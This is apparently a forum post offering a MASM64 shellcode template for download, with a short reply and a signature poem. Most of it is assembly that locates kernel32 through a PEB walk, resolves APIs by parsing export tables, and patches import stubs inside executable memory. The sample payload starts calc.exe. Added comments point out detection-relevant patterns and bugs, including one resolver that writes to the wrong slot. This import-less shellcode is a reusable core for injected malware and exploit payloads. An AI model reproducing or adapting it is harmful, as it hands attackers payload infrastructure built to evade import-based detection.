Masm64 shellcode template

发表于 2016-7-12 02:53:41 | 显示全部楼层 |阅读模式

编译工具：VS 或 DDK 附带的汇编器 ml64
option casemap:none 			; symbol names are case-sensitive (API names such as CreateProcessA must match exactly)


;--------------------------------------------------------------------------------
;set name=Shellcode
;ml /c /coff /Cp /Fl /Gd /nologo %name%.asm
;link /SUBSYSTEM:CONSOLE /DEBUG /DEBUGTYPE:CV %name%.obj /OUT:%name%.exe
;PAUSE
;--------------------------------------------------------------------------------



  
include shellcode.inc
include macro.asm


; SHELL is a separate, named code segment; the harness entry further down lives in the
; default .code segment, so presumably only this segment is extracted as the payload — TODO confirm.
; Nothing in this segment uses an import table: every API address is recovered at run time
; via _KernelBase (PEB walk) and _GetProcAddress (export-table parse). Data (import slots,
; strings) is interleaved with code, so instruction order and byte layout are load-bearing;
; the ";N" annotations are the author's encoding sizes in bytes.
.code SHELL
	jmp _main					;5  entry point of the segment: skip over the stubs that follow
;-----------------------------------------------------------------------
; _thunk — shared tail of the import stubs below.
; In:   rax = address of an _imp__* QWORD slot (recovered by the stub's call/pop)
; Does: jmp through the slot: into the _thunk__* resolver on first use, straight
;       into the real API afterwards. The stack is left untouched, so the target
;       sees the original caller's return address and stack-passed arguments.
;-----------------------------------------------------------------------
_thunk proc
	jmp QWORD ptr [rax]			;2
_thunk endp

;-----------------------------------------------------------------------
; CreateProcessA — self-patching import stub (same shape as CloseHandle / GetStartupInfo).
; `call @F` pushes the address of whatever immediately follows it, i.e. the
; _imp__CreateProcessA slot; `pop rax` retrieves that address and _thunk jumps
; through it. The slot is seeded with the (link-time, absolute) address of
; _thunk__CreateProcessA, which resolves the real export on first call and
; overwrites the slot with it.
; NOTE(review): the slot is data inside the code segment and is written at run
; time (see _thunk__CreateProcessA), so the memory holding this segment has to be
; writable as well as executable — a self-modifying / RWX pattern that
; memory-protection monitoring typically flags.
;-----------------------------------------------------------------------
CreateProcessA proc  
	call @F						;5  push address of the slot below
	_imp__CreateProcessA	QWORD offset _thunk__CreateProcessA	;8  import slot, not code
@@:	
	pop rax						;1  rax = &_imp__CreateProcessA
	jmp _thunk					;2
CreateProcessA endp


;-----------------------------------------------------------------------
; CloseHandle — self-patching import stub, identical in shape to CreateProcessA:
; call/pop yields the address of the _imp__CloseHandle slot, _thunk jumps through
; it (resolver _thunk__CloseHandle on first use, real API afterwards).
;-----------------------------------------------------------------------
CloseHandle proc
	call @F						; push address of the slot below

	_imp__CloseHandle		QWORD offset _thunk__CloseHandle	; import slot, not code
@@:	
	pop rax						; rax = &_imp__CloseHandle
	jmp _thunk
CloseHandle endp

;-----------------------------------------------------------------------
; GetStartupInfo — self-patching import stub, same shape as CreateProcessA.
; The slot is named _imp__GetStartupInfoA (the ANSI export the resolver asks for).
; Not called from anything in this file; present as part of the template.
;-----------------------------------------------------------------------
GetStartupInfo proc
	call @F						; push address of the slot below
	_imp__GetStartupInfoA	QWORD offset _thunk__GetStartupInfo	; import slot, not code

@@:	
	pop rax						; rax = &_imp__GetStartupInfoA
	jmp _thunk
GetStartupInfo endp


;-----------------------------------------------------------------------
; _KernelBase — find a loaded module base without an import table.
; Walks TEB (gs) -> PEB -> PEB_LDR_DATA.InInitializationOrderModuleList and reads
; the DllBase (16 bytes past each InInitializationOrderLinks entry, hence
; Blink[SizeOf QWORD]) of the first three list entries. The author's annotations
; name them ntdll, KERNELBASE, kernel32; the third is what gets returned.
; Out:   rax = DllBase of the 3rd entry (kernel32 per the annotation)
;        rdx = 1st entry's base, rcx = 2nd entry's base — incidental, no caller uses them
; Clobb: rcx, rdx, flags (no `uses` list)
; NOTE(review): the list order is loader behaviour, not a contract — assumes the
; order annotated here; TODO confirm on each Windows version the sample is run on.
; Defender note: this PEB/Ldr walk is the classic import-less API-resolution
; pattern that detection logic keys on.
;-----------------------------------------------------------------------
_KernelBase proc
	mov rax,(_TEB ptr gs:[0]).NtTib.Self						; rax = TEB
	mov rax,(_TEB ptr [rax]).ProcessEnvironmentBlock			; rax = PEB
	
	mov rax,(_PEB ptr [rax]).Ldr								; rax = PEB_LDR_DATA
	mov rax,(_PEB_LDR_DATA ptr [rax]).InInitializationOrderModuleList.Flink	; 1st entry
	
	mov rdx,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD]	;ntdll (DllBase of 1st entry)
	
	mov rax,(_LIST_ENTRY ptr [rax]).Flink						; 2nd entry
	mov rcx,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD];KERNELBASE (DllBase of 2nd entry)
	
	
	mov rax,(_LIST_ENTRY ptr [rax]).Flink						; 3rd entry
	mov rax,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD];kenrl32 (DllBase of 3rd entry) -> result
	
	ret
_KernelBase endp


;-----------------------------------------------------------------------
; _StrLen — byte count of a NUL-terminated string, terminator included.
; In:    rax = pointer to the string
; Out:   rax = number of bytes scanned up to and including the NUL
;        (i.e. strlen + 1 — _StrCmp depends on the +1)
; Uses:  rdi, rcx saved/restored by the `uses` list; flags clobbered by scasb
;-----------------------------------------------------------------------
_StrLen proc uses rdi rcx
	mov rdi,rax					; rdi = s
	xor eax,eax					; al = 0: the byte scasb looks for
	mov rcx,-1					; effectively unbounded scan
	repne scasb					; rcx is decremented once per byte, NUL included
	mov rax,rcx
	not rax						; ~(-1 - bytes) = bytes
	ret
_StrLen endp

;-----------------------------------------------------------------------
; _StrCmp — compare two NUL-terminated strings for equality.
; In:    rsi = first string, rdi = second string
; Out:   rax = 0 if equal, non-zero otherwise (the rdi string's _StrLen when the
;        lengths differ, else the count repe cmpsb had left at the first mismatch)
; Uses:  rcx, rsi, rdi saved/restored by the `uses` list; flags clobbered
; Relies on _StrLen counting the terminator: both lengths and the cmpsb run
; include the NUL, so a complete match is exactly the case where rcx reaches 0.
;-----------------------------------------------------------------------
_StrCmp proc uses rcx rsi rdi
	
	mov rax,rsi
	call _StrLen				; rax = bytes of first string (NUL included)
	
	mov rcx,rax
	
	mov rax,rdi
	call _StrLen				; rax = bytes of second string (NUL included)
	
	cmp rax,rcx
	jnz @F 						; different lengths: rax is already non-zero
		repe cmpsb				; same length: byte-wise compare, rcx counts down
		mov rax,rcx				; 0 only when every byte (incl. NUL) matched
	@@:
	ret
	ret							; unreachable duplicate of the ret above
_StrCmp endp

;-----------------------------------------------------------------------
; _GetProcAddress — resolve an export by name by reading the PE export table
; directly, so no GetProcAddress import is needed. Forwarded exports are not
; handled; the lookup is a linear scan of AddressOfNames.
; In:    rcx = module base, rdx = pointer to the NUL-terminated export name
; Out:   rax = address of the export, or 0 if the image is not PE32+ (MZ / PE /
;        0x20B checks) or the name is not found
; Uses:  rsi, rdi, rbx saved/restored by the `uses` list; rcx and rdx are read
;        but not written; r8, r9, flags clobbered
; Defender note: with the PEB walk in _KernelBase this export-table parse is the
; other half of the import-less API-resolution pattern.
;-----------------------------------------------------------------------
_GetProcAddress proc uses rsi rdi rbx
	mov rsi,rcx					; rsi = module base (DOS header)
	
	mov ax,(IMAGE_DOS_HEADER ptr [rsi]).e_magic
	
	cmp ax,"ZM"					; "MZ" as a little-endian word
	jz @F
	
		xor rax,rax				; not a DOS/PE image
		jmp done
	
	@@:
	mov ebx,(IMAGE_DOS_HEADER ptr [rsi]).e_lfanew
	add rbx,rsi					; rbx = IMAGE_NT_HEADERS
	
	mov eax,(IMAGE_NT_HEADERS ptr [rbx]).Signature
	cmp eax,"EP"				; "PE\0\0"
	jz @F
		xor rax,rax
		jmp done
	@@:
	
	lea rbx,(IMAGE_NT_HEADERS ptr [rbx]).OptionalHeader	; rbx = optional header
	
	mov ax,(_IMAGE_OPTIONAL_HEADER64 ptr [rbx]).Magic
	cmp ax,20Bh					; PE32+ only
	jz @F
		;PE 32
		xor rax,rax
		jmp done
	@@:
	
EXP EQU IMAGE_DIRECTORY_ENTRY_EXPORT*SizeOf _IMAGE_DATA_DIRECTORY	; byte offset of the export entry in DataDirectory
	; NOTE(review): [ebx] here is a 32-bit address operand, unlike the [rbx] form used everywhere else in this proc
	mov ebx,(_IMAGE_OPTIONAL_HEADER64 ptr [ebx]).DataDirectory[EXP][_IMAGE_DATA_DIRECTORY.VirtualAddress]
	
	add rbx,rcx					; rbx = IMAGE_EXPORT_DIRECTORY (RVA -> VA)
	
	
	mov r9d,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfNames
	add r9,rcx					; r9 = name-RVA table
	
	
	xor r8,r8					; r8 = name index
	
re:
	mov eax,[r9][r8*4]
	add rax,rcx					; rax = candidate export name
	
	mov si,[rax]				; only the low 16 bits of rsi matter; rsi is reloaded below
	
	
	cmp si,[rdx]				; cheap prefilter: first two bytes must match
	jnz @F
	
	mov rsi,rax
	mov rdi,rdx
	call _StrCmp				; rax = 0 when the full names are equal
	
	or rax,rax
	jnz @F
	
	mov edi,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfFunctions
	add rdi,rcx					; rdi = function-RVA table
	
	mov eax,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfNameOrdinals
	add rax,rcx					; rax = ordinal table
	
	movzx eax,word ptr [rax][r8*2]	; ordinal for this name index
	mov eax,[rdi][rax*4]		; function RVA
	add rax,rcx					; rax = function VA
	
	jmp done
	
	@@:
	inc r8
	cmp r8d,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).NumberOfNames
	jb re						; unsigned loop bound
		
	xor rax,rax					; not found


done:		
	ret
_GetProcAddress endp


;-----------------------------------------------------------------------
; _thunk__CreateProcessA — first-use resolver behind the CreateProcessA stub.
; Entered by jmp, not call: the stack still holds the original caller's return
; address and stack-passed arguments, so the four register args are preserved
; around the lookup and the stack is left exactly as found.
; Does:  base = _KernelBase(); rax = _GetProcAddress(base, "CreateProcessA");
;        _imp__CreateProcessA = rax (later calls bypass this resolver);
;        push rax / ret = tail-jump into the API with the caller's frame intact.
; The `call @F` / inline string / `pop rdx` sequence is the same trick as the
; import stubs: the call pushes the address of the bytes that follow it.
; NOTE(review): a 0 result from _GetProcAddress is not checked; it would be stored
; in the slot and then jumped to by `push rax / ret`.
;-----------------------------------------------------------------------
_thunk__CreateProcessA proc

	push r9						; preserve the caller's register args
	push r8
	push rdx
	push rcx
	call _KernelBase	
	mov rcx,rax					; rcx = module base
	call @F	
	byte "CreateProcessA",0		; inline name; its address is what the call pushed
	@@:
	pop rdx						; rdx = &"CreateProcessA"
	call _GetProcAddress
	
	mov _imp__CreateProcessA,rax	; patch the slot in the code segment
	
	pop rcx
	pop rdx
	pop r8
	pop r9
	push rax					; tail-jump into the resolved API
	ret
_thunk__CreateProcessA endp


;-----------------------------------------------------------------------
; _thunk__CloseHandle — first-use resolver behind the CloseHandle stub; same
; structure as _thunk__CreateProcessA: save register args, resolve "CloseHandle"
; from the module _KernelBase returns, patch _imp__CloseHandle, restore args and
; tail-jump (push rax / ret) into the API. A 0 lookup result is not checked.
;-----------------------------------------------------------------------
_thunk__CloseHandle proc
	push r9						; preserve the caller's register args
	push r8
	push rdx
	push rcx
	call _KernelBase	
	mov rcx,rax					; rcx = module base
	call @F	
	byte "CloseHandle",0		; inline name; its address is what the call pushed
	@@:
	pop rdx						; rdx = &"CloseHandle"
	call _GetProcAddress
	
	mov _imp__CloseHandle,rax	; patch the slot in the code segment
	
	pop rcx
	pop rdx
	pop r8
	pop r9
	push rax					; tail-jump into the resolved API
	ret
_thunk__CloseHandle endp


;-----------------------------------------------------------------------
; _thunk__GetStartupInfo — first-use resolver behind the GetStartupInfo stub;
; same structure as _thunk__CreateProcessA, resolving "GetStartupInfoA".
; NOTE(review): the store below goes to _imp__CloseHandle, not to the stub's own
; slot _imp__GetStartupInfoA — looks like a copy/paste slip from the resolver
; above, so the GetStartupInfo slot would never be patched and the CloseHandle
; slot would be redirected instead. Nothing in this file calls GetStartupInfo,
; so the path is dead here.
;-----------------------------------------------------------------------
_thunk__GetStartupInfo proc
	push r9						; preserve the caller's register args
	push r8
	push rdx
	push rcx
	call _KernelBase	
	mov rcx,rax					; rcx = module base
	call @F	
	byte "GetStartupInfoA",0	; inline name; its address is what the call pushed
	@@:
	pop rdx						; rdx = &"GetStartupInfoA"
	call _GetProcAddress
	
	mov _imp__CloseHandle,rax	; see NOTE(review) above: wrong slot
	
	pop rcx
	pop rdx
	pop r8
	pop r9
	push rax					; tail-jump into the resolved API
	ret
_thunk__GetStartupInfo endp


;-----------------------------------------------------------------------
; _main — payload body: CreateProcessA(rcx, NULL x7, &_si, &_pi), then close the
; two returned handles if the call succeeded.
; In:    rcx = lpApplicationName (the harness passes the inline "calc.exe")
; Out:   rax = whatever the last API call returned (CreateProcessA's result on the
;        failure path, the second CloseHandle's on the success path)
; @LOCAL / END_LOCAL / fastcall / EPILOG are macros from macro.asm (not shown);
; presumably END_LOCAL QWORD * 10 reserves the outgoing-argument area (4 shadow
; slots + 6 stack args) for the 10-argument call and EPILOG tears the frame down —
; TODO confirm against macro.asm.
; NOTE(review): only STARTUPINFO.cb is cleared (to 0); the rest of _si and all of
; _pi are whatever the macro leaves on the stack — TODO confirm @LOCAL
; zero-initialises, otherwise CreateProcessA reads uninitialised STARTUPINFO fields.
;-----------------------------------------------------------------------
_main proc uses rdi
	@LOCAL _si,STARTUPINFO
	@LOCAL _pi,PROCESS_INFORMATION
	END_LOCAL QWORD * 10
	
	and (STARTUPINFO ptr _si).cb,0	; cb = 0; no other field is touched
	
	
	fastcall CreateProcessA,rcx,0,0,0,0,0,0,0,addr _si,addr _pi
	
	or eax,eax					; CreateProcessA returns 0 on failure
	jz @F
	
	fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hThread
	
	fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hProcess
	
	
	@@:
	EPILOG	
	ret
_main endp


; Back to the default code segment: the harness entry below is separate from the
; SHELL segment above and presumably not part of what gets extracted — TODO confirm.
.code




;-----------------------------------------------------------------------
; WinMainCRTStartup — test-harness entry of the built .exe. Uses the same
; call/pop trick as the stubs to put the address of an inline "calc.exe" string in
; rcx, then calls _main. The `int 3`s are debugger breakpoints for stepping the
; sample; run outside a debugger they raise an unhandled STATUS_BREAKPOINT and
; terminate the process.
; NOTE(review): no stack realignment before `call _main`; whether the 16-byte
; alignment needed at the CreateProcessA call still holds depends on the prologue
; macros in _main — TODO confirm.
;-----------------------------------------------------------------------
WinMainCRTStartup proc
	int 3						; breakpoint: before the payload
	
	call @F
	byte "calc.exe",0			; inline argument string
	@@:
	pop rcx						; rcx = &"calc.exe"
	int 3						; breakpoint: about to enter _main
	call _main
	
	int 3						; breakpoint: after _main returns
	ret
WinMainCRTStartup endp


; No entry label is given to `end`, so the linker's default entry is used — TODO confirm it resolves to WinMainCRTStartup
end

Shellcode.rar

7.06 KB, 下载次数: 2


 楼主| 发表于 2016-7-12 03:08:10 | 显示全部楼层
有 bug 请反馈，不定时处理。

发表于 2016-7-12 19:10:47 | 显示全部楼层
支持Ayala!
In the beginning I was not the best.
And the world was also not the best.
But I still know that I am who I am.
Because I think that it is good.
I have been working hard.
I have been keeping growth with the world.
And it was so.